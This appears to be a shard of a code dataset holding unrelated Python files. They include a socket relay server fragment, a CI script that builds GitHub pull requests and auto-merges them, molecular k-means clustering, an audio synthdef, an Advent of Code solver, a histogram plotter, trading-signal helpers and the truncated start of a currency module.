= ip_requests[next_msg]\r\n # Check to see if ip_requests has been fulfilled\r\n #If not, check the timestamp in ip_requests to see if it has timed out\r\n #If not, place it back in the queus and try later\r\n print(cr.response)\r\n if cr.response != b'':\r\n s.send(cr.response)\r\n print()\r\n print(\"Sending response to client\", cr.response)\r\n elif (time.time() - cr.time_start) > TS_TIMEOUT:\r\n error_msg = next_msg.decode('utf-8') + \" - Error:HOST NOT FOUND\"\r\n s.send(error_msg.encode('utf-8'))\r\n del ip_requests[next_msg]\r\n print()\r\n print(\"Sending timeout error to client\", next_msg + \" - 
Error:HOST NOT FOUND\")\r\n                    else:\r\n                        msg_queues[s].put(next_msg)\r\n                else:\r\n                    #Send message to TS1 or TS2\r\n                    s.send(next_msg)\r\n                    print(\"Sending to TS\", next_msg.decode(\"UTF-8\"))\r\n            else:\r\n                #if there are no messages for the socket remove it from the output socket list\r\n                if (s in outputs):\r\n                    outputs.remove(s)\r\n\r\n'''\r\nThis is the main method of ls.py where ls.py is expecting six arguments to start successfully.\r\n'''\r\nif __name__ == \"__main__\":\r\n    if len(sys.argv) != 6:\r\n        print(\"Incorrect Usage: python ls.py <port> <TS1 hostname> <TS1 port> <TS2 hostname> <TS2 port>\")\r\n        sys.exit(1)\r\n    ls_server()\r\n\r\n\r\n","sub_path":"ls.py","file_name":"ls.py","file_ext":"py","file_size_in_byte":7607,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"456743685","text":"import theano.tensor as T\nimport lasagne\n\n\ndef stack_rnn(l_emb, l_mask, num_layers, num_units,\n              grad_clipping=10, dropout_rate=0.,\n              bidir=True,\n              name='',\n              rnn_layer=lasagne.layers.LSTMLayer):\n    \"\"\"\n    Stack multiple RNN layers.\n    \"\"\"\n\n    def _rnn(backwards=True, name=''):\n        network = l_emb\n        for layer in range(num_layers):\n            if dropout_rate > 0:\n                network = lasagne.layers.DropoutLayer(network, p=dropout_rate)\n            network = rnn_layer(network, num_units,\n                                grad_clipping=grad_clipping,\n                                mask_input=l_mask,\n                                backwards=backwards,\n                                name=name + '_layer' + str(layer + 1))\n        return network\n\n    network = _rnn(True, name)\n    if bidir:\n        network = lasagne.layers.ConcatLayer([network, _rnn(False, name + '_back')], axis=-1)\n    return network\n","sub_path":"nn_lasagne/src/similarity/lasagne_rnn_layer.py","file_name":"lasagne_rnn_layer.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"454616485","text":"# publisher/forms.py\nfrom django import forms\nfrom models import Publisher\nfrom django.utils.translation import ugettext_lazy as _\n\n\nclass PublisherForm(forms.ModelForm):\n\n    class Meta:\n        model = Publisher\n        fields = ('name_publisher', 'is_active')\n        labels = {\n            'name_publisher': _('Publisher Name'),\n            'is_active': _('Is Active?'),\n        }\n","sub_path":"publisher/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"528723626","text":"#!/usr/bin/env python\n\n# run the continuous integration process\n# includes watching the git repo for pull requests and commits\n\nimport os\nimport sys\nimport requests\nimport json\nfrom time import sleep, gmtime, strftime\nfrom subprocess import call, check_output, CalledProcessError\n\nrepo_owner = 'snhack'\nrepo_name = 'LogoBot'\n\nrepos_rel_dir = '../../'\nprimary_repo_dir = 'LogoBot'\nstaging_repo_dir = primary_repo_dir + 'Staging'\n\nci_log_name = 'ci.log'\nprhist = []\n\ndef dict_in_array(dict, key, value):\n    res = False\n    for item in dict:\n        if item[key] == value:\n            res = True\n            break\n    return res\n\ndef poll(un, pw, proxies):\n    \n    cilog = open(ci_log_name, 'a+')\n    cilog.seek(0)\n    \n    # load cilog into prhist\n    lines = cilog.readlines()\n    for line in lines:\n        line = line.split('_')\n        num = int(line[0])\n        dt = line[1]\n        if not dict_in_array(prhist, 'number', num):\n            prhist.append({'number':num, 'updated_at':dt})\n\n    print(\"Polling for pull requests for commits...\")\n    print(\"\")\n    \n    while True:\n        print(strftime(\"%H:%M:%S\", gmtime()))\n        print(\"Getting list of pull requests...\")\n        \n        r = 
requests.get('https://api.github.com/repos/'+repo_owner+'/'+repo_name+'/pulls', auth=(un, pw), proxies=proxies)\n \n jso = r.json()\n \n print(\" Found: \"+str(len(jso))+\" pull request(s)\")\n \n for p in jso:\n print(\"Checking: #\"+str(p['number']) + \" - \"+ p['title'] + \" by \"+p['user']['login'])\n \"\"\"\n print(p['body'])\n print(p['state'])\n print(p['merged_at'])\n print(p['updated_at'])\n \"\"\"\n \n # check if the pull request is ready to be merged\n if p['state'] == 'open' and p['merged_at']== None:\n \n # check if we've done it before?\n if not dict_in_array(prhist, 'number', p['number']): \n try:\n errorlevel = 0\n \n oplog = 'Build Log\\n---\\n'\n \n comments_url = p['_links']['comments']['href']\n \n # comment\n payload = {\n 'body':'CI: Starting build process...'\n }\n r = requests.post(comments_url, auth=(un, pw), proxies=proxies, data=json.dumps(payload))\n \n \n \n # Discard any local changes\n print(\" Clean working tree\")\n o = check_output(['git','reset'])\n o += check_output(['git','checkout','--','.'])\n o += check_output(['git','clean','-f'])\n print(o)\n oplog += \"\\nClean working tree\\n\"\n oplog += o\n \n print(\" Remote update\")\n o = check_output(['git','remote','update','-p'])\n print(o)\n oplog += \"\\nRemote Update\\n\"\n oplog += o\n \n # rebase to master\n print(\" Merge fast-forward master\")\n o = check_output(['git','merge','--ff-only','master'])\n print(o)\n oplog += \"\\nMerge fast-forward\\n\"\n oplog += o\n \n branch = p['head']['ref']\n \n print(\" Checkout master\")\n o = check_output(['git','checkout','master'])\n print(o)\n oplog += \"\\nCheckout master\\n\"\n oplog += o\n \n print(\" Merge branch: \"+branch)\n o = ''\n try:\n o = check_output(['git','merge','--strategy-option','theirs','--no-commit','origin/'+branch])\n print(o)\n except CalledProcessError as e:\n print(\" Error: \"+ str(e.returncode))\n errorlevel = e.returncode\n \n oplog += \"\\nMerge branch: origin/\"+branch+\"\\n\"\n oplog += o\n \n if errorlevel == 0: \n # Now run the build process \n print(\" Building\")\n \n os.chdir('hardware/ci')\n o = ''\n try:\n o = check_output(['./build.py'])\n print(o)\n except CalledProcessError as e:\n print(\" Error: \"+ str(e.returncode))\n errorlevel = 1\n \n os.chdir('../../')\n \n oplog += \"\\n\\nBuilding\\n--------\\n\"\n oplog += o\n \n \n if errorlevel == 0:\n print(\" Passed, auto-merging into master...\")\n \n # comment\n payload = {\n 'body':'CI: Build process successful - auto-merging into master\\n\\n' + oplog\n }\n r = requests.post(comments_url, auth=(un, pw), proxies=proxies, data=json.dumps(payload))\n \n # merge\n payload = {\n 'commit_message':p['title']\n }\n r = requests.put(p['_links']['self']['href'] + '/merge', \n auth=(un, pw), proxies=proxies, data=json.dumps(payload))\n print(r)\n \n else:\n print(\" Errors, adding to pull request comments...\")\n \n # log the error\n payload = {\n 'body':'CI: Unable to auto-merge, build process encountered errors\\n\\n' + oplog\n }\n r = requests.post(comments_url, auth=(un, pw), proxies=proxies, data=json.dumps(payload))\n \n \n \n # Log this request so we don't process it again\n hist = {'number':p['number'], 'updated_at':p['updated_at']}\n prhist.append(hist)\n cilog.write(str(p['number']) + '_' + p['updated_at'] + '_' + str(errorlevel)+'\\n')\n cilog.flush()\n \n print(\" Done\")\n \n \n except CalledProcessError as e:\n print(\"Error: \"+ str(e.returncode))\n else:\n print(\" Skipping\")\n \n else:\n print(\" Error: Pull request not open or already merged\")\n \n 
print(\"\")\n sleep(60)\n call(['clear'])\n \n cilog.close()\n \n\ndef ci(un, pw, http_proxy=\"\", https_proxy=\"\"):\n print(\"Continuous Integration\")\n print(\"----------------------\")\n \n proxies = {\n \"http\": http_proxy,\n \"https\": https_proxy,\n }\n \n print(\"\")\n print(\"Checking connection to github...\")\n \n r = requests.get('https://api.github.com/user', auth=(un, pw), proxies=proxies)\n if r.status_code == 200:\n print(\" OK\")\n \n print(\"Changing working directory...\")\n os.chdir(repos_rel_dir)\n \n print(\" Now in: \"+os.getcwd())\n \n print(\"Changing to staging dir: \"+staging_repo_dir)\n if os.path.isdir(staging_repo_dir):\n os.chdir(staging_repo_dir)\n print(\" OK\")\n \n # Could check for empty dir here and if so, do a git clone?\n # git clone git@github.com:snhack/LogoBot .\n \n contents = os.listdir('.')\n if len(contents) == 0:\n print(\" Staging empty - cloning repo\")\n o = check_output(['git','clone','git@github.com:'+repo_owner+'/'+repo_name,'.'])\n \n poll(un, pw, proxies)\n \n else:\n print(\" Error: Staging dir does not exist\")\n \n \n else:\n print(\" Error\")\n print(\" Status Code: \"+r.status_code)\n print(\" Response: \"+r.text)\n \n \n \n # o = check_output(['git','branch'])\n\nif __name__ == '__main__':\n if len(sys.argv) == 3:\n ci(sys.argv[1], sys.argv[2], \"\", \"\")\n elif len(sys.argv) > 3:\n ci(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\n else:\n print(\"Usage: ci \")","sub_path":"ci/ci.py","file_name":"ci.py","file_ext":"py","file_size_in_byte":9452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"373809529","text":"import os, random\nfrom collections import Counter\n\nfrom sklearn.cluster import MiniBatchKMeans, AgglomerativeClustering\nfrom sklearn.decomposition import PCA\nfrom sklearn.metrics import adjusted_rand_score, silhouette_score\nfrom rdkit import Chem\nfrom rdkit.Chem import AllChem\nimport numpy as np\nimport pandas as pd\n\ndef make_array(text):\n return np.fromstring(text.replace(\"[\", \"\").replace(\"]\", \"\"), sep=' ')\n\n\ndef read_one_csv(path):\n df = pd.read_csv(path)\n df['descriptors'] = df['descriptors'].apply(make_array)\n return df\n\n\ndef read_csvs(folder):\n df = pd.DataFrame(columns=[\"smiles\", \"descriptors\"])\n for filename in sorted(os.listdir(folder)):\n if filename.endswith('.csv'):\n full_path = os.path.join(folder, filename)\n df = df.append(read_one_csv(full_path), ignore_index=True)\n print(filename, \"finished\")\n return df\n\ndef kmeans_clustering(path, save_dir):\n df = read_csvs(path)\n print(len(df))\n # create a dictionary\n smiles_descriptors_dict = dict(zip(df.smiles, df.descriptors))\n print(\"Total number of molecules:\", len(smiles_descriptors_dict))\n # why is the length of this dictionary different than smiles and descriptors? 
Because of DUPLICATES!\n SUBSET_SIZE = 50000000\n start = 0\n cs = \"k-means++\"\n for i in range(SUBSET_SIZE, len(smiles_descriptors_dict)+SUBSET_SIZE, SUBSET_SIZE):\n # print step:\n print(\"ITERATION:\", i/SUBSET_SIZE)\n # set i to len(dict) if i > len(dict)\n if i > len(smiles_descriptors_dict):\n i = len(smiles_descriptors_dict)\n # take a subset of the dictionary\n print(\"Taking subset of the dictionary:\", start, i)\n dict_subset = {key: smiles_descriptors_dict[key] for key in list(smiles_descriptors_dict.keys())[start:i]}\n start = i\n # run minibatch kmeans\n print(\"starting minibatch kmeans\")\n kmeans = MiniBatchKMeans(n_clusters=39, batch_size=800, verbose=1, init=cs).fit(list(dict_subset.values()))\n cs = kmeans.cluster_centers_\n # create a new df with row1:smiles, row2:cluster label\n smiles_label_df = pd.DataFrame(list(zip(dict_subset.keys(), kmeans.labels_)), columns=[\"smiles\", \"labels\"])\n # save this df as csv\n if save_dir:\n smiles_label_df.to_csv(\"../data/labels/\" + save_dir + \".csv\")\n\n return kmeans\n\nif __name__ == \"__main__\":\n\n folder = \"../data/zinc15-minor-targets-features\"\n true_labels = {}\n for index, file in enumerate(sorted(os.listdir(folder))):\n if file.endswith(\".csv\"):\n df = pd.read_csv(os.path.join(folder, file))\n for _, row in df.iterrows():\n true_labels[row[\"smiles\"]] = index\n\n df = pd.read_csv(\"../data/labels/zinc15-minor-targets.csv\")\n ordered_true_labels = {}\n for _, row in df.iterrows():\n ordered_true_labels[row[\"smiles\"]] = true_labels[row[\"smiles\"]]\n\n df = pd.read_csv(\"../data/labels/zinc15-minor-targets.csv\", index_col=0)\n fps = {}\n for index, row in df.iterrows():\n if not (index % 10000):\n print(index)\n m = Chem.MolFromSmiles(row[\"smiles\"])\n fp = AllChem.GetMorganFingerprintAsBitVect(m, 2, nBits=1024).ToBitString()\n fps[row[\"smiles\"]] = np.frombuffer(fp.encode(), dtype='u1') - ord('0')\n\n print(\"fps completed...\")\n indices = random.sample(range(0, len(fps)), 50000) # randomly selected indices\n selected_fps = [list(fps.values())[i] for i in indices]\n print(\"values completed\")\n selected_smiles = [list(fps.keys())[i] for i in indices]\n print(\"keys completed\")\n selected_true_labels = []\n for sm in selected_smiles:\n selected_true_labels.append(true_labels[sm])\n\n print(\"starting pca\")\n pca = PCA(n_components=20).fit_transform(selected_fps)\n print(\"pca completed...\")\n\n sil_scores = []\n rand_scores = []\n sil_scores_120 = []\n rand_scores_120 = []\n less_than_120_k = []\n for i in range(20, 80, 5):\n # need to sample by index\n print(\"ITERATION:\", i)\n kmeans = MiniBatchKMeans(n_clusters=i, batch_size=800, init=\"k-means++\").fit(pca)\n print(\"kmeans completed...\")\n rs = adjusted_rand_score(selected_true_labels, kmeans.labels_)\n print(\"adjusted rand score:\", rs)\n rand_scores.append(rs)\n ss = silhouette_score(pca, kmeans.labels_)\n print(\"silhouette score:\", ss)\n sil_scores.append(ss)\n counter = Counter(kmeans.labels_)\n less_than_120 = []\n for k in range(len(pca)):\n if counter[kmeans.labels_[k]] < 120:\n continue\n less_than_120.append(pca[k])\n print(\"len_120:\", len(less_than_120))\n if len(less_than_120) < len(pca):\n less_than_120_k.append(i)\n kmeans = MiniBatchKMeans(n_clusters=i, batch_size=800, init=\"k-means++\").fit(less_than_120)\n print(\"kmeans completed...\")\n #rs = adjusted_rand_score(selected_true_labels, kmeans.labels_)\n #print(\"adjusted rand score:\", rs)\n #rand_scores_120.append(rs)\n ss = silhouette_score(less_than_120, 
kmeans.labels_)\n print(\"silhouette score:\", ss)\n sil_scores_120.append(ss)\n\n\n\n\n\n\n\n","sub_path":"featurizer/kmeans_clustering.py","file_name":"kmeans_clustering.py","file_ext":"py","file_size_in_byte":5220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"438192420","text":"from supriya import synthdeftools\nfrom supriya import ugentools\n\n\ndef signal_block_pre(builder, source, state):\n #source = ugentools.Limiter.ar(\n # duration=ugentools.Rand.ir(0.005, 0.015),\n # source=source,\n # )\n return source\n\n\ndef signal_block(builder, source, state):\n frequencies, amplitudes, decay_times = [], [], []\n nyquist = ugentools.SampleRate.ir() / 2\n for _ in range(state.get('iterations') or 4):\n\n frequency = ugentools.ExpRand.ir(\n minimum=builder['frequency_minimum'],\n maximum=builder['frequency_maximum'],\n )\n\n coefficient = (nyquist - frequency) / nyquist\n amplitude = ugentools.ExpRand.ir() * (coefficient ** 2)\n decay_time = ugentools.Rand.ir(1, 2)\n\n frequencies.append(frequency)\n amplitudes.append(amplitude)\n decay_times.append(decay_time)\n\n specifications = [frequencies, amplitudes, decay_times]\n source = ugentools.Klank.ar(\n source=source,\n decay_scale=builder['decay_scale'],\n frequency_offset=builder['frequency_offset'],\n frequency_scale=builder['frequency_scale'],\n specifications=specifications,\n )\n return source\n\n\ndef signal_block_post(builder, source, state):\n source = ugentools.LeakDC.ar(source=source)\n source *= builder['gain'].db_to_amplitude()\n source = ugentools.Limiter.ar(\n duration=ugentools.Rand.ir(0.005, 0.015),\n source=source,\n )\n return source\n\n\nfactory = synthdeftools.SynthDefFactory(\n channel_count=2,\n decay_scale=1,\n frequency_offset=0,\n frequency_scale=1,\n gain=0,\n frequency_minimum=20,\n frequency_maximum=1000,\n )\nfactory = factory.with_input()\nfactory = factory.with_signal_block(signal_block_pre)\nfactory = factory.with_signal_block(signal_block)\nfactory = factory.with_signal_block(signal_block_post)\n\nnrt_klank_random_factory = factory \\\n .with_output(crossfaded=True, leveled=True, windowed=True) \\\n .with_rand_id()\nnrt_klank_random = nrt_klank_random_factory.build(name='klank_random')\n\n__all__ = (\n 'nrt_klank_random',\n 'nrt_klank_random_factory',\n )\n","sub_path":"pipermeth001/synthdefs/klank_random.py","file_name":"klank_random.py","file_ext":"py","file_size_in_byte":2156,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"579351472","text":"import requests\nimport pytest\n\nhost = 'http://localhost:16648'\nbase_url = host+'/api/v0/'\n\n\n@pytest.mark.skip(reason='re-enable this when we have additional logic here to get a working msg_id and email address')\ndef test_gmail_one_click_success():\n re = requests.get(base_url + 'gmail-oneclick/relay', params={\n 'token': 'kBfq3A0qc4ea4OLCQeZXJG1XEKNYih0Q6jCPwZ2D2SiAdb36jh4Bjci_rDQwpVgRaegPOcJut3xz1dgmF3l7KQ==',\n 'msg_id': 351192,\n 'email_address': 'email@email.com',\n 'cmd': 'claim',\n })\n assert re.status_code == 204\n\n\ndef test_gmail_one_click_bad_token():\n re = requests.get(base_url + 'gmail-oneclick/relay', params={\n 'token': 'faketoken',\n 'msg_id': 351192,\n 'email_address': 'foo@foo.com',\n 'cmd': 'claim',\n })\n assert re.status_code == 403\n","sub_path":"test/e2etest.py","file_name":"e2etest.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} 
+{"seq_id":"30936724","text":"# Day 19 part 1\n\neip = 0\neip_reg = 0\nregisters = [1, 0, 0, 0, 0, 0]\n\n\ndef parse(test_input):\n global eip_reg\n\n instructions = []\n with open(test_input) as f:\n first_line = True\n for line in f.readlines():\n line = line.strip()\n\n if first_line:\n eip_reg = int(line[4:])\n first_line = False\n else:\n split_line = line.split(\" \")\n instructions.append((split_line[0], split_line[1:]))\n\n return instructions\n\n\ndef print_out(orig, name, values):\n global eip, registers\n print(\"ip={} {} {} {} {}\".format(eip, orig, name, values, registers), flush=True)\n #input()\n\n\ndef run_instruction(instruction):\n global eip, registers\n\n name = instruction[0]\n values = list(map(lambda x: int(x), instruction[1]))\n a = values[0]\n b = values[1]\n c = values[2]\n\n orig = str(registers)\n\n registers[eip_reg] = eip\n\n if name == \"addr\":\n registers[c] = registers[a] + registers[b]\n elif name == \"addi\":\n registers[c] = registers[a] + b\n elif name == \"mulr\":\n registers[c] = registers[a] * registers[b]\n elif name == \"muli\":\n registers[c] = registers[a] * b\n elif name == \"banr\":\n registers[c] = registers[a] & registers[b]\n elif name == \"bani\":\n registers[c] = registers[a] & b\n elif name == \"borr\":\n registers[c] = registers[a] | registers[b]\n elif name == \"bori\":\n registers[c] = registers[a] | b\n elif name == \"setr\":\n registers[c] = registers[a]\n elif name == \"seti\":\n registers[c] = a\n elif name == \"gtir\":\n registers[c] = (1 if a > registers[b] else 0)\n elif name == \"gtri\":\n registers[c] = (1 if registers[a] > b else 0)\n elif name == \"gtrr\":\n registers[c] = (1 if registers[a] > registers[b] else 0)\n elif name == \"eqir\":\n registers[c] = (1 if a == registers[b] else 0)\n elif name == \"eqri\":\n registers[c] = (1 if registers[a] == b else 0)\n elif name == \"eqrr\":\n registers[c] = (1 if registers[a] == registers[b] else 0)\n\n #print_out(orig, name, values)\n\n eip = registers[eip_reg]\n eip += 1\n\n\nins = parse(\"input\")\n#print(ins)\nprint(eip_reg)\n\nwhile eip <= len(ins)-1:\n run_instruction(ins[eip])\n\nprint(registers)","sub_path":"19/adventofcode-19.1.py","file_name":"adventofcode-19.1.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"51698836","text":"#!/usr/bin/env python3\n\n\"\"\"histogram.py: simple histogram plotter.\n\n# http://matplotlib.org/examples/statistics/histogram_demo_cumulative.html\n\n# runme\n# $ echo -e \"1\\n2\\n1\\n2\\n3\\n1\\n4\\n\" | ./plotty-histogram.py - /tmp/bar.png\n\"\"\"\n\nimport argparse\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport math\nimport sys\n\n\ndefault_values = {\n 'debug': 0,\n 'title': '--title',\n 'label': '',\n 'col': 0,\n # number of bins for the histogram\n 'nbins': 50,\n 'sigma': None,\n 'filter': None,\n 'fmt': 'ro',\n 'sep': None,\n 'xlabel': '--xlabel',\n 'ylabel': '--ylabel',\n 'add_mean': False,\n 'add_median': False,\n 'xlim': ['-', '-'],\n 'ylim': ['-', '-'],\n 'infile': None,\n 'outfile': None,\n}\n\n# filter ops\nVALID_OPS = 'eq', 'ne'\n\ndef read_data(infile, options):\n # open infile\n if infile != sys.stdin:\n try:\n fin = open(infile, 'rb+')\n except IOError:\n print('Error: cannot open file \"%s\":', infile)\n else:\n fin = sys.stdin.buffer\n\n # read data\n data = fin.read()\n\n # split the input in lines\n data = data.decode('ascii').split('\\n')\n # remove comment lines\n data = [line for line in data if not 
line.startswith('#')]\n # break up each line in fields\n if options.sep is None:\n # use space and tab\n data = [item.replace('\\t', ' ') for item in data]\n sep = options.sep if options.sep is not None else ' '\n\n # filter lines\n if options.filter:\n new_data = []\n for row in data:\n if not row:\n continue\n for col, op, val in options.filter:\n field = row.split(sep)[int(col)]\n if ((op == 'eq' and field == val) or\n (op == 'ne' and field != val)):\n new_data.append(row)\n data = new_data\n\n if options.col == -1:\n x = range(len([row for row in data if row]))\n else:\n x = [float(row.split(sep)[options.col]) for row in data if row]\n # remove values way over the average\n if options.sigma is not None:\n total_x = sum(x)\n mean_x = total_x / len(x)\n stddev_x = math.sqrt(sum((i - mean_x) ** 2 for i in x) / (len(x) - 1))\n min_value = mean_x - (stddev_x * options.sigma)\n max_value = mean_x + (stddev_x * options.sigma)\n new_x = [i for i in x if i > min_value and i < max_value]\n if (len(x) - len(new_x)) / len(x) > 0.1:\n print('Ignoring sigma removal of outliers (at sigma: %f would be '\n 'dropping %f%% of the values' % (\n options.sigma, 100. * (len(x) - len(new_x)) / len(x)))\n else:\n if options.debug > 0:\n print('Removing %i of %i values sigma: %f stddev: %f '\n 'range: [%f, %f]' % (\n len(x) - len(new_x), len(x), options.sigma,\n stddev_x, min_value, max_value))\n x = new_x\n return x\n\n\ndef create_graph(x, options):\n # create figure\n fig, ax = plt.subplots(figsize=(8, 4))\n\n # plot the non-cumulative histogram\n n, bins, patches = ax.hist(x, options.nbins, histtype='step')\n\n # add median and average\n if options.add_median:\n plt.axvline(np.median(x), color='r', linestyle='dotted', linewidth=1)\n if options.add_mean:\n plt.axvline(np.mean(x), color='k', linestyle='dashed', linewidth=1)\n\n # tidy up the figure\n ax.grid(True)\n ax.legend(loc='right')\n ax.set_title(options.title)\n ax.set_xlabel(options.xlabel)\n ax.set_ylabel('Frequency of the value')\n\n # set xlim/ylim\n if options.xlim[0] != '-':\n plt.xlim(left=float(options.xlim[0]))\n if options.xlim[1] != '-':\n plt.xlim(right=float(options.xlim[1]))\n if options.ylim[0] != '-':\n plt.ylim(bottom=float(options.ylim[0]))\n if options.ylim[1] != '-':\n plt.ylim(top=float(options.ylim[1]))\n\n # plt.show()\n print('output is %s' % options.outfile)\n plt.savefig('%s' % options.outfile)\n\n\ndef get_options(argv):\n # parse opts\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-d', '--debug', action='count',\n dest='debug', default=default_values['debug'],\n help='Increase verbosity (multiple times for more)',)\n parser.add_argument('--quiet', action='store_const',\n dest='debug', const=-1,\n help='Zero verbosity',)\n parser.add_argument('--title', action='store',\n dest='title', default=default_values['title'],\n metavar='PLOTTITLE',\n help='use PLOTTITLE plot title',)\n parser.add_argument('-c', '--col', action='store', type=int,\n dest='col', default=default_values['col'],\n metavar='COL',\n help='use COL col',)\n parser.add_argument('-b', '--nbins', action='store', type=int,\n dest='nbins', default=default_values['nbins'],\n metavar='NBINS',\n help='use NBINS bins',)\n parser.add_argument('--sigma', action='store', type=float,\n dest='sigma', default=default_values['sigma'],\n metavar='SIGMA',\n help='use avg += (SIGMA * stddev) to remove outliers',)\n parser.add_argument('--filter', action='append', type=str, nargs=3,\n dest='filter', default=default_values['filter'],\n 
metavar=('COL', 'OP', 'VAL'),\n                        help='select only rows where COL OP VAL is true',)\n    parser.add_argument('--sep', action='store', type=str,\n                        dest='sep', default=default_values['sep'],\n                        metavar='SEP',\n                        help='use SEP as separator',)\n    parser.add_argument('--xlabel', action='store',\n                        dest='xlabel', default=default_values['xlabel'],\n                        metavar='XLABEL',\n                        help='use XLABEL x label',)\n    parser.add_argument('--ylabel', action='store',\n                        dest='ylabel', default=default_values['ylabel'],\n                        metavar='YLABEL',\n                        help='use YLABEL y label',)\n    parser.add_argument('--label', action='store',\n                        dest='label', default=default_values['label'],\n                        metavar='LABEL',\n                        help='use LABEL label',)\n    parser.add_argument('--add-mean', action='store_const',\n                        dest='add_mean', const=True,\n                        default=default_values['add_mean'],\n                        help='Add a line at the mean',)\n    parser.add_argument('--add-median', action='store_const',\n                        dest='add_median', const=True,\n                        default=default_values['add_median'],\n                        help='Add a line at the median',)\n    parser.add_argument('--xlim', action='store', type=str, nargs=2,\n                        dest='xlim', default=default_values['xlim'],\n                        metavar=('left', 'right'),)\n    parser.add_argument('--ylim', action='store', type=str, nargs=2,\n                        dest='ylim', default=default_values['ylim'],\n                        metavar=('bottom', 'top'),)\n    parser.add_argument('infile', type=str,\n                        default=default_values['infile'],\n                        metavar='input-file',\n                        help='input file',)\n    parser.add_argument('outfile', type=str,\n                        default=default_values['outfile'],\n                        metavar='output-file',\n                        help='output file',)\n    # do the parsing\n    options = parser.parse_args(argv[1:])\n\n    # check the filter\n    if options.filter:\n\n        def is_int(s):\n            if s[0] in ('-', '+'):\n                return s[1:].isdigit()\n            return s.isdigit()\n\n        def is_op(s):\n            return s in VALID_OPS\n        for col, op, val in options.filter:\n            assert is_int(col) and is_op(op), 'invalid filter: %s %s %s' % (\n                col, op, val)\n    return options\n\n\ndef main(argv):\n    # parse options\n    options = get_options(argv)\n    # get infile/outfile\n    if options.infile == '-':\n        options.infile = sys.stdin\n    if options.outfile == '-':\n        options.outfile = sys.stdout\n    # print results\n    if options.debug > 2:\n        print(options)\n    # create the graph\n    x = read_data(options.infile, options)\n    create_graph(x, options)\n\n\nif __name__ == '__main__':\n    # at least the CLI program name: (CLI) execution\n    main(sys.argv)\n","sub_path":"plotty-histogram.py","file_name":"plotty-histogram.py","file_ext":"py","file_size_in_byte":8754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"15819357","text":"#!/usr/bin/python\n\"\"\"xquant common definitions and utility functions\"\"\"\n\nimport utils.tools as ts\n\nSIDE_BUY = \"BUY\"\nSIDE_SELL = \"SELL\"\n\nORDER_TYPE_LIMIT = \"LIMIT\"\nORDER_TYPE_MARKET = \"MARKET\"\n\nORDER_STATUS_WAIT = \"wait\"\nORDER_STATUS_OPEN = \"open\"\nORDER_STATUS_CLOSE = \"close\"\nORDER_STATUS_CANCELLING = \"cancelling\"\nORDER_STATUS_CANCELLED = \"cancelled\"\n\n\ndef creat_symbol(target_coin, base_coin):\n    \"\"\"create symbol\"\"\"\n    return \"%s_%s\" % (target_coin.lower(), base_coin.lower())\n\n\ndef get_symbol_coins(symbol):\n    \"\"\"get the coins that make up a symbol\"\"\"\n    coins = symbol.split(\"_\")\n    return tuple(coins)\n\n\ndef create_balance(coin, free, frozen):\n    \"\"\" create a balance record \"\"\"\n    return {\"coin\": coin, \"free\": free, \"frozen\": frozen}\n\n\ndef get_balance_free(balance):\n    \"\"\" get the free amount \"\"\"\n    return ts.str_to_float(balance[\"free\"])\n\n\ndef get_balance_frozen(balance):\n    \"\"\" get the frozen amount \"\"\"\n    return 
ts.str_to_float(balance[\"frozen\"])\n\n\ndef create_signal(side, pst_rate, rmk, can_buy_after=None):\n \"\"\"创建交易信号\"\"\"\n return {\"side\": side, \"pst_rate\": pst_rate, \"rmk\": rmk, \"can_buy_after\": can_buy_after}\n\n\ndef decision_signals(signals):\n \"\"\"决策交易信号\"\"\"\n sdf = pd.DataFrame(signals)\n sdf_min = sdf.groupby(\"side\")[\"pst_rate\"].min()\n\n if xq.SIDE_SELL in sdf_min:\n return xq.SIDE_SELL, sdf_min[xq.SIDE_SELL]\n\n if xq.SIDE_BUY in sdf_min:\n return xq.SIDE_BUY, sdf_min[xq.SIDE_BUY]\n\n return None, None\n\n\ndef decision_signals2(signals):\n \"\"\"决策交易信号\"\"\"\n if not signals:\n return None, None, None, None\n\n side = None\n for signal in signals:\n new_side = signal[\"side\"]\n new_rate = signal[\"pst_rate\"]\n new_rmk = signal[\"rmk\"]\n new_cba = signal[\"can_buy_after\"]\n\n if side is None:\n side = new_side\n rate = new_rate\n rmk = new_rmk\n cba = new_cba\n elif side is new_side:\n if rate > new_rate:\n rate = new_rate\n rmk = new_rmk\n elif rate == new_rate:\n rmk += \", \" + new_rmk\n if new_cba:\n if cba:\n if new_cba > cba:\n cba = new_cba\n else:\n cba = new_cba\n\n else:\n if side is SIDE_BUY:\n side = new_side\n rate = new_rate\n rmk = new_rmk\n cba = new_cba\n\n return side, rate, rmk, cba\n","sub_path":"common/xquant.py","file_name":"xquant.py","file_ext":"py","file_size_in_byte":2484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"381443332","text":"\"\"\"currency.py: a module for currency exchange\nThis module provides several string parsing functions to implement a \nsimple currency exchange routine using an online currency service. \nThe primary function in this module is exchange.\n__author__ = \"GuoXiao\"\n__pkuid__ = \"1700011795\"\n__email__ = \"1700011795@pku.edu.cn\"\n\"\"\"\n\n\ndef exchange(currency_from, currency_to, amount_from):\n \"\"\"This function is designed for changing the currency of current to the\ncurrency of target according to imported information.\n\"\"\"\n from urllib.request import urlopen\n errorlist=[\"f\",\"a\",\"l\",\"s\",\"e\"]\n wrong=\"Wrong import! 
